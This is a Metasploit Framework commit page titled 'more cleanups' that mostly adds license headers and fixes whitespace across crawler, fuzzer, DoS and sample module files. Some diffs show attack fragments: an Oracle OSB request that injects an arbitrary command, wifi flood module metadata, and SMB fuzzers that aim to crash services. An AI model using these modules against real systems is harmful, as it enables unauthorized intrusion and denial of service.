Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Browse files

more cleanups

git-svn-id: file:///home/svn/framework3/trunk@9212 4d416f70-5f16-0410-b530-b9f4589650da
  • Loading branch information...
commit 0e72894e583d3a64c993cda90ffb25c2efb77686 1 parent df9ec8a
@jduck jduck authored
Showing with 1,484 additions and 943 deletions.
  1. +22 −9 data/msfcrawler/basic.rb
  2. +33 −21 data/msfcrawler/flash.rb
  3. +33 −20 data/msfcrawler/forms.rb
  4. +20 −7 data/msfcrawler/objects.rb
  5. +21 −8 data/msfcrawler/scripts.rb
  6. +4 −0 documentation/samples/framework/dump_module_info.rb
  7. +4 −0 documentation/samples/framework/encode_file.rb
  8. +4 −0 documentation/samples/framework/enumerate_modules.rb
  9. +4 −0 documentation/samples/framework/run_exploit_using_base.rb
  10. +4 −0 documentation/samples/framework/run_exploit_using_core.rb
  11. +3 −4 documentation/samples/modules/auxiliary/sample.rb
  12. +13 −2 documentation/samples/modules/encoders/sample.rb
  13. +17 −3 documentation/samples/modules/exploits/sample.rb
  14. +11 −0 documentation/samples/modules/nops/sample.rb
  15. +13 −2 documentation/samples/modules/payloads/singles/sample.rb
  16. +4 −1 modules/auxiliary/admin/http/tomcat_administration.rb
  17. +12 −1 modules/auxiliary/admin/motorola/wr850g_cred.rb
  18. +1 −1  modules/auxiliary/admin/oracle/oracle_sql.rb
  19. +8 −4 modules/auxiliary/admin/oracle/osb_execqr.rb
  20. +5 −5 modules/auxiliary/dos/wifi/cts_rts_flood.rb
  21. +14 −3 modules/auxiliary/dos/wifi/file2air.rb
  22. +1 −3 modules/auxiliary/dos/wifi/netgear_ma521_rates.rb
  23. +3 −6 modules/auxiliary/dos/wifi/netgear_wg311pci.rb
  24. +14 −3 modules/auxiliary/dos/windows/http/pi3web_isapi.rb
  25. +12 −12 modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb
  26. +9 −9 modules/auxiliary/fuzzers/smb/smb_create_pipe.rb
  27. +19 −19 modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb
  28. +12 −12 modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb
  29. +18 −18 modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb
  30. +13 −13 modules/auxiliary/fuzzers/ssh/ssh_version_15.rb
  31. +13 −13 modules/auxiliary/fuzzers/ssh/ssh_version_2.rb
  32. +13 −13 modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb
  33. +31 −31 modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb
  34. +30 −30 modules/auxiliary/fuzzers/tds/tds_login_username.rb
  35. +20 −15 modules/auxiliary/gather/dns_enum.rb
  36. +16 −12 modules/auxiliary/gather/search_email_collector.rb
  37. +4 −2 modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb
  38. +18 −8 modules/auxiliary/scanner/dect/call_scanner.rb
  39. +21 −11 modules/auxiliary/scanner/dect/station_scanner.rb
  40. +4 −2 modules/auxiliary/scanner/finger/finger_users.rb
  41. +4 −2 modules/auxiliary/scanner/ftp/ftp_version.rb
  42. +3 −2 modules/auxiliary/scanner/http/cert.rb
  43. +6 −4 modules/auxiliary/scanner/http/enum_delicious.rb
  44. +1 −1  modules/auxiliary/scanner/http/enum_wayback.rb
  45. +8 −3 modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
  46. +4 −3 modules/auxiliary/scanner/http/options.rb
  47. +12 −3 modules/auxiliary/scanner/http/sqlmap.rb
  48. +3 −1 modules/auxiliary/scanner/http/ssl.rb
  49. +5 −3 modules/auxiliary/scanner/http/svn_scanner.rb
  50. +1 −3 modules/auxiliary/scanner/http/trace_axd.rb
  51. +5 −2 modules/auxiliary/scanner/http/web_vulndb.rb
  52. +4 −0 modules/auxiliary/scanner/imap/imap_version.rb
  53. +4 −5 modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
  54. +3 −3 modules/auxiliary/scanner/nfs/nfsmount.rb
  55. +1 −1  modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
  56. +4 −0 modules/auxiliary/scanner/pop3/pop3_version.rb
  57. +4 −0 modules/auxiliary/scanner/smtp/smtp_version.rb
  58. +4 −2 modules/auxiliary/scanner/telnet/telnet_version.rb
  59. +3 −3 modules/auxiliary/scanner/x11/open_x11.rb
  60. +2 −5 modules/auxiliary/server/capture/ftp.rb
  61. +2 −0  modules/auxiliary/server/capture/http_ntlm.rb
  62. +11 −0 modules/auxiliary/server/capture/telnet.rb
  63. +1 −3 modules/auxiliary/server/file_autopwn.rb
  64. +0 −1  modules/auxiliary/spoof/dns/bailiwicked_domain.rb
  65. +40 −30 modules/auxiliary/spoof/dns/compare_results.rb
  66. +1 −1  modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb
  67. +1 −1  modules/auxiliary/sqli/oracle/dbms_export_extension.rb
  68. +9 −6 modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb
  69. +9 −6 modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb
  70. +2 −6 modules/encoders/x86/alpha_mixed.rb
  71. +3 −3 modules/exploits/multi/fileformat/maple_maplet.rb
  72. +1 −0  modules/exploits/multi/ftp/wuftpd_site_exec_format.rb
  73. +2 −3 modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb
  74. +3 −0  modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb
  75. +10 −1 modules/exploits/solaris/sunrpc/ypupdated_exec.rb
  76. +2 −2 modules/exploits/unix/webapp/guestbook_ssi_exec.rb
  77. +8 −6 modules/exploits/windows/backdoor/energizer_duo_payload.rb
  78. +17 −14 modules/exploits/windows/browser/adobe_jbig2decode.rb
  79. +12 −8 modules/exploits/windows/browser/adobe_utilprintf.rb
  80. +21 −21 modules/exploits/windows/browser/ms09_043_owc_msdso.rb
  81. +1 −1  modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
  82. +10 −6 modules/exploits/windows/fileformat/adobe_jbig2decode.rb
  83. +7 −4 modules/exploits/windows/fileformat/mediajukebox.rb
  84. +2 −2 modules/exploits/windows/fileformat/mymp3player_m3u.rb
  85. +1 −0  modules/exploits/windows/ftp/vermillion_ftpd_port.rb
  86. +1 −0  modules/exploits/windows/http/bea_weblogic_jsessionid.rb
  87. +1 −0  modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb
  88. +1 −1  modules/exploits/windows/http/hp_nnm_ovwebhelp.rb
  89. +1 −0  modules/exploits/windows/http/httpdx_handlepeer.rb
  90. +1 −0  modules/exploits/windows/http/httpdx_tolog_format.rb
  91. +11 −1 modules/payloads/singles/linux/x86/chmod.rb
  92. +0 −2  modules/payloads/singles/linux/x86/exec.rb
  93. +0 −2  modules/payloads/singles/windows/exec.rb
  94. +11 −0 modules/payloads/stagers/osx/x86/bind_tcp.rb
  95. +4 −0 modules/payloads/stages/netware/shell.rb
  96. +0 −2  modules/payloads/stages/osx/x86/bundleinject.rb
  97. +11 −2 modules/payloads/stages/windows/dllinject.rb
  98. +1 −3 modules/payloads/stages/windows/patchupdllinject.rb
  99. +11 −0 modules/payloads/stages/windows/vncinject.rb
  100. +5 −5 modules/payloads/stages/windows/x64/vncinject.rb
  101. +21 −17 msfcli
  102. +6 −2 msfconsole
  103. +4 −0 msfd
  104. +3 −1 msfelfscan
  105. +4 −0 msfencode
  106. +4 −0 msfgui
  107. +4 −0 msfmachscan
  108. +4 −0 msfopcode
  109. +4 −0 msfpayload
  110. +4 −0 msfpescan
  111. +6 −2 msfrpc
  112. +7 −3 msfrpcd
  113. +4 −0 msfweb
  114. +5 −0 plugins/auto_add_route.rb
  115. +7 −0 plugins/db_credcollect.rb
  116. +4 −0 plugins/db_mysql.rb
  117. +4 −0 plugins/db_postgres.rb
  118. +4 −0 plugins/db_sqlite2.rb
  119. +4 −0 plugins/db_sqlite3.rb
  120. +12 −7 plugins/db_tracker.rb
  121. +17 −12 plugins/db_wmap.rb
  122. +4 −0 plugins/event_tester.rb
  123. +15 −10 plugins/ips_filter.rb
  124. +4 −0 plugins/msfd.rb
  125. +4 −0 plugins/nexpose.rb
  126. +9 −7 plugins/pcap_log.rb
  127. +8 −3 plugins/sample.rb
  128. +5 −0 plugins/session_tagger.rb
  129. +15 −10 plugins/socket_logger.rb
  130. +5 −0 plugins/sounds.rb
  131. +12 −7 plugins/thread.rb
  132. +5 −0 plugins/token_hunter.rb
  133. +21 −17 plugins/xmlrpc.rb
  134. +3 −3 scripts/meterpreter/checkvm.rb
  135. +13 −13 scripts/meterpreter/getcountermeasure.rb
  136. +2 −2 scripts/meterpreter/getgui.rb
  137. +2 −2 scripts/meterpreter/gettelnet.rb
  138. +2 −2 scripts/meterpreter/hostsedit.rb
  139. +2 −2 scripts/meterpreter/killav.rb
  140. +2 −2 scripts/meterpreter/migrate.rb
  141. +9 −4 scripts/meterpreter/multi_console_command.rb
  142. +1 −1  scripts/meterpreter/multicommand.rb
  143. +2 −2 scripts/meterpreter/multiscript.rb
  144. +2 −2 scripts/meterpreter/netenum.rb
  145. +12 −12 scripts/meterpreter/prefetchtool.rb
  146. +5 −5 scripts/meterpreter/remotewinenum.rb
  147. +3 −3 scripts/meterpreter/search_dwld.rb
  148. +11 −11 scripts/meterpreter/winbf.rb
  149. +3 −3 scripts/meterpreter/winenum.rb
  150. +6 −6 test/tests/03_range_walker_test.rb
  151. +7 −3 tools/convert_31.rb
  152. +4 −0 tools/exe2vba.rb
  153. +4 −0 tools/exe2vbs.rb
  154. +4 −0 tools/find_badchars.rb
  155. +4 −0 tools/halflm_second.rb
  156. +36 −32 tools/import_webscarab.rb
  157. +4 −0 tools/lm2ntcrack.rb
  158. +5 −0 tools/metasm_shell.rb
  159. +7 −4 tools/module_author.rb
  160. +7 −3 tools/module_license.rb
  161. +4 −0 tools/module_ports.rb
  162. +4 −0 tools/module_reference.rb
  163. +2 −0  tools/module_targets.rb
  164. +4 −0 tools/msf_irb_shell.rb
  165. +134 −131 tools/msfcrawler.rb
  166. +87 −84 tools/msfproxy.rb
  167. +4 −0 tools/nasm_shell.rb
  168. +5 −1 tools/pattern_create.rb
  169. +2 −0  tools/pattern_offset.rb
View
31 data/msfcrawler/basic.rb
@@ -1,3 +1,16 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+# $Revision$
+
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,28 +19,28 @@
class CrawlerSimple < BaseParser
def parse(request,result)
-
+
if !result['Content-Type'].include? "text/html"
return
end
-
+
doc = Hpricot(result.body.to_s)
doc.search('a').each do |link|
-
+
hr = link.attributes['href']
-
- if hr and !hr.match(/^(\#|javascript\:)/)
+
+ if hr and !hr.match(/^(\#|javascript\:)/)
begin
- hreq = urltohash('GET',hr,request['uri'],nil)
-
+ hreq = urltohash('GET',hr,request['uri'],nil)
+
insertnewpath(hreq)
-
+
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
- end
+ end
end
View
54 data/msfcrawler/flash.rb
@@ -1,8 +1,20 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+# $Revision$
+
require 'rubygems'
require 'pathname'
require 'uri'
-
$flarebinary = "/home/et/Downloads/flare"
$flareoutdir = "/home/et/Downloads/"
@@ -13,52 +25,52 @@ def parse(request,result)
rexp = ['loadMovieNum\(\'(.*?)\'',
'loadMovie\(\'(.*?)\'',
'getURL\(\'(.*?)\''
- ]
+ ]
+
-
if !result['Content-Type'].include? "application/x-shockwave-flash"
return
end
-
+
outswf = File.join($flareoutdir,request['uri'].gsub(/\//,'_'))
-
- puts "Downloading SWF file to: #{outswf}"
-
- ffile = File.new(outswf, "wb")
+
+ puts "Downloading SWF file to: #{outswf}"
+
+ ffile = File.new(outswf, "wb")
ffile.puts(result.body)
- ffile.close
+ ffile.close
system("#{$flarebinary} #{outswf}")
-
+
outflr = outswf.gsub('.swf','.flr')
-
+
if File.exists?(outflr)
- puts "Decompiled SWF file to: #{outflr}"
+ puts "Decompiled SWF file to: #{outflr}"
else
puts "Error: Decompilation failed."
return
end
-
+
File.open(outflr, "r") do |infile|
while (line = infile.gets)
- rexp.each do |r|
- links = line.to_s.scan(Regexp.new(r,true)) #"
- links.each do |link|
-
+ rexp.each do |r|
+ links = line.to_s.scan(Regexp.new(r,true)) #"
+ links.each do |link|
+
begin
hreq = urltohash('GET',link[0],request['uri'],nil)
insertnewpath(hreq)
-
+
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
- end
+ end
end
end
- end
- end
+ end
+ end
end
View
53 data/msfcrawler/forms.rb
@@ -1,3 +1,16 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+# $Revision$
+
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,11 +19,11 @@
class CrawlerForms < BaseParser
def parse(request,result)
-
+
if !result['Content-Type'].include? "text/html"
return
end
-
+
hr = ''
m = ''
@@ -21,44 +34,44 @@ def parse(request,result)
fname = f.attributes['name']
if fname.empty?
fname = "NONE"
- end
+ end
m = "GET"
if !f.attributes['method'].empty?
m = f.attributes['method'].upcase
end
-
- #puts "Parsing form name: #{fname} (#{m})"
-
+
+ #puts "Parsing form name: #{fname} (#{m})"
+
htmlform = Hpricot(f.inner_html)
-
+
arrdata = []
-
+
htmlform.search('input').each do |p|
#puts p.attributes['name']
#puts p.attributes['type']
#puts p.attributes['value']
-
- #raw_request has uri_encoding disabled as it encodes '='.
- arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
+
+ #raw_request has uri_encoding disabled as it encodes '='.
+ arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
end
-
+
data = arrdata.join("&").to_s
-
-
+
+
begin
hreq = urltohash(m,hr,request['uri'],data)
-
+
hreq['ctype'] = 'application/x-www-form-urlencoded'
-
+
insertnewpath(hreq)
-
-
+
+
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
- end
- end
+ end
+ end
end
View
27 data/msfcrawler/objects.rb
@@ -1,3 +1,16 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+# $Revision$
+
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,11 +19,11 @@
class CrawlerObjects < BaseParser
def parse(request,result)
-
+
if !result['Content-Type'].include? "text/html"
return
end
-
+
hr = ''
m = ''
@@ -21,15 +34,15 @@ def parse(request,result)
begin
hreq = urltohash('GET',s,request['uri'],nil)
-
+
insertnewpath(hreq)
-
-
+
+
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
- end
- end
+ end
+ end
end
View
29 data/msfcrawler/scripts.rb
@@ -1,3 +1,16 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+# $Revision$
+
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,11 +19,11 @@
class CrawlerScripts < BaseParser
def parse(request,result)
-
+
if !result['Content-Type'].include? "text/html"
return
end
-
+
hr = ''
m = ''
@@ -20,16 +33,16 @@ def parse(request,result)
s = obj['src']
begin
- hreq = urltohash('GET',s,request['uri'],nil)
-
+ hreq = urltohash('GET',s,request['uri'],nil)
+
insertnewpath(hreq)
-
-
+
+
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
- end
- end
+ end
+ end
end
View
4 documentation/samples/framework/dump_module_info.rb
@@ -1,8 +1,12 @@
#!/usr/bin/env ruby
#
+# $Id$
+#
# This sample demonstrates how a module's information can be easily serialized
# to a readable format.
#
+# $Revision$
+#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
View
4 documentation/samples/framework/encode_file.rb
@@ -1,8 +1,12 @@
#!/usr/bin/env ruby
#
+# $Id$
+#
# This sample demonstrates how a file can be encoded using a framework
# encoder.
#
+# $Revision$
+#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
View
4 documentation/samples/framework/enumerate_modules.rb
@@ -1,8 +1,12 @@
#!/usr/bin/env ruby
#
+# $Id$
+#
# This sample demonstrates enumerating all of the modules in the framework and
# displays their module type and reference name.
#
+# $Revision$
+#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
View
4 documentation/samples/framework/run_exploit_using_base.rb
@@ -1,9 +1,13 @@
#!/usr/bin/env ruby
#
+# $Id$
+#
# This sample demonstrates using the framework core directly to launch an
# exploit. It makes use of the simplified exploit wrapper method provided by
# the Msf::Simple::Exploit mixin.
#
+# $Revision$
+#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
View
4 documentation/samples/framework/run_exploit_using_core.rb
@@ -1,10 +1,14 @@
#!/usr/bin/env ruby
#
+# $Id$
+#
# This sample demonstrates using the framework core directly to launch an
# exploit. It uses the framework base Framework class so that the
# distribution module path is automatically set, but relies strictly on
# framework core classes for everything else.
#
+# $Revision$
+#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
View
7 documentation/samples/modules/auxiliary/sample.rb
@@ -1,15 +1,14 @@
##
-# $Id: test.rb 4419 2007-02-18 00:10:39Z hdm $
+# $Id$
##
##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
-
require 'msf/core'
module Msf
@@ -49,7 +48,7 @@ def auxiliary_commands
def cmd_aux_extra_command(*args)
print_status("Running inside aux_extra_command()")
end
-
+
end
end
View
15 documentation/samples/modules/encoders/sample.rb
@@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
module Msf
module Encoders
@@ -28,7 +39,7 @@ def encode_block(state, buf)
buf
end
-end
+end
-end
+end
end
View
20 documentation/samples/modules/exploits/sample.rb
@@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
require 'msf/core'
module Msf
@@ -19,20 +30,23 @@ def initialize(info = {})
super(update_info(info,
'Name' => 'Sample exploit',
'Description' => %q{
- This exploit module illustrates how a vulnerability could be exploited
+ This exploit module illustrates how a vulnerability could be exploited
in an TCP server that has a parsing bug.
},
'Author' => 'skape',
'Version' => '$Revision$',
+ 'References' =>
+ [
+ ],
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
},
- 'Targets' =>
+ 'Targets' =>
[
# Target 0: Windows All
- [
+ [
'Windows Universal',
{
'Platform' => 'win',
View
11 documentation/samples/modules/nops/sample.rb
@@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
require 'msf/core'
module Msf
View
15 documentation/samples/modules/payloads/singles/sample.rb
@@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
require 'msf/core'
module Msf
@@ -30,6 +41,6 @@ def initialize(info = {})
end
-end
-end
+end
+end
end
View
5 modules/auxiliary/admin/http/tomcat_administration.rb
@@ -1,11 +1,14 @@
##
+# $Id$
+##
+
+##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
-
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
View
13 modules/auxiliary/admin/motorola/wr850g_cred.rb
@@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
@@ -8,7 +19,7 @@ def initialize(info = {})
super(update_info(info,
'Name' => 'Motorola WR850G v4.03 Credentials',
'Description' => %q{
- Login credentials to the Motorola WR850G router with
+ Login credentials to the Motorola WR850G router with
firmware v4.03 can be obtained via a simple GET request
if issued while the administrator is logged in. A lot
more information is available through this request, but
View
2  modules/auxiliary/admin/oracle/oracle_sql.rb
@@ -25,7 +25,7 @@ def initialize(info = {})
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
- 'Version' => '$Revision: 7688 $',
+ 'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'https://www.metasploit.com/users/mc' ],
View
12 modules/auxiliary/admin/oracle/osb_execqr.rb
@@ -1,4 +1,8 @@
##
+# $Id$
+##
+
+##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
@@ -44,14 +48,14 @@ def run
cmd = datastore['CMD']
uri = "/login.php?clear=no&ora_osb_lcookie=&ora_osb_bgcookie=#{r}&button=Logout&rbtool="
-
+
req = uri + Rex::Text.uri_encode(cmd)
-
+
print_status("Sending command: #{datastore['CMD']}...")
res = send_request_raw({'uri' => req,},5)
-
+
print_status("Done.")
-
+
end
end
View
10 modules/auxiliary/dos/wifi/cts_rts_flood.rb
@@ -20,14 +20,14 @@ def initialize(info ={})
super(update_info(info,
'Name' => 'Wireless CTS/RTS Flooder',
'Description' => %q{
- This module sends 802.11 CTS/RTS requests to a specific wireless peer,
- using the specified source address,
- },
-
+ This module sends 802.11 CTS/RTS requests to a specific wireless peer,
+ using the specified source address,
+ },
'Author' => [ 'Brad Antoniewicz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
- ))
+ ))
+
register_options(
[
OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
View
17 modules/auxiliary/dos/wifi/file2air.rb
@@ -1,15 +1,26 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireless Frame (File) Injector',
'Description' => %q{
- Inspired by Josh Wright's file2air, this module writes
+ Inspired by Josh Wright's file2air, this module writes
wireless frames from a binary file to the air, allowing
you to substitute some addresses before it gets sent.
Unlike the original file2air (currently v1.1), this module
@@ -62,7 +73,7 @@ def run
end
close_wifi
- end
+ end
def substaddrs(frame)
tods = (frame[1] & 1) == 1
View
4 modules/auxiliary/dos/wifi/netgear_ma521_rates.rb
@@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
-
require 'msf/core'
-
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
@@ -35,8 +33,8 @@ def initialize(info = {})
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
-
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
+ 'Version' => '$Revision$',
'License' => MSF_LICENSE,
'References' =>
[
View
9 modules/auxiliary/dos/wifi/netgear_wg311pci.rb
@@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
-
require 'msf/core'
-
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
@@ -32,18 +30,17 @@ def initialize(info = {})
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
-
},
-
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
+ 'Version' => '$Revision$',
'License' => MSF_LICENSE,
'References' =>
- [
+ [
['CVE', '2006-6125'],
['OSVDB', '30511'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'],
- ]
+ ]
))
register_options(
[
View
17 modules/auxiliary/dos/windows/http/pi3web_isapi.rb
@@ -1,12 +1,23 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
-
+
def initialize(info = {})
- super(update_info(info,
+ super(update_info(info,
'Name' => 'Pi3Web <=2.0.13 ISAPI DoS',
'Description' => %q{
The Pi3Web HTTP server crashes when a request is made
@@ -39,7 +50,7 @@ def run
print_status("Request sent to #{rhost}:#{rport}")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Couldn't connect to #{rhost}:#{rport}")
- rescue ::Timeout::Error, ::Errno::EPIPE
+ rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
View
24 modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Negotiate SMB2 Dialect Corruption',
@@ -33,7 +33,7 @@ def initialize(info = {})
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
-
+
def do_smb_negotiate(pkt,opts={})
@connected = false
connect
@@ -41,27 +41,27 @@ def do_smb_negotiate(pkt,opts={})
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
-
+
def run
last_str = nil
last_inp = nil
last_err = nil
-
+
pkt = make_smb_negotiate
cnt = 0
-
+
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
-
+
print_status("Fuzzing SMB negotiate packet with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
-
+
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
-
+
begin
r = do_smb_negotiate(str, 0.25)
rescue ::Interrupt
@@ -72,21 +72,21 @@ def run
ensure
disconnect
end
-
+
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
end
return
end
-
+
last_str = str
last_inp = @last_fuzzer_input
end
end
-
+
def make_smb_negotiate
# The SMB 2 dialect must be there
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002']
View
18 modules/auxiliary/fuzzers/smb/smb_create_pipe.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Create Pipe Request Fuzzer',
@@ -29,7 +29,7 @@ def initialize(info = {})
'Version' => '$Revision$'
))
end
-
+
def do_smb_create(pkt,opts={})
@connected = false
connect
@@ -37,21 +37,21 @@ def do_smb_create(pkt,opts={})
@connected = true
smb_create("\\" + pkt)
end
-
+
def run
last_str = nil
last_inp = nil
last_err = nil
-
+
cnt = 0
fuzz_strings do |str|
cnt += 1
-
+
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
-
+
begin
do_smb_create(str, 0.25)
rescue ::Interrupt
@@ -62,16 +62,16 @@ def run
ensure
disconnect
end
-
+
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
end
return
end
-
+
last_str = str
last_inp = @last_fuzzer_input
end
View
38 modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Create Pipe Request Corruption',
@@ -32,43 +32,43 @@ def initialize(info = {})
OptString.new('SMBPIPE', [true, 'Specify the pipe name to corrupt', "\\BROWSER"])
], self.class)
end
-
+
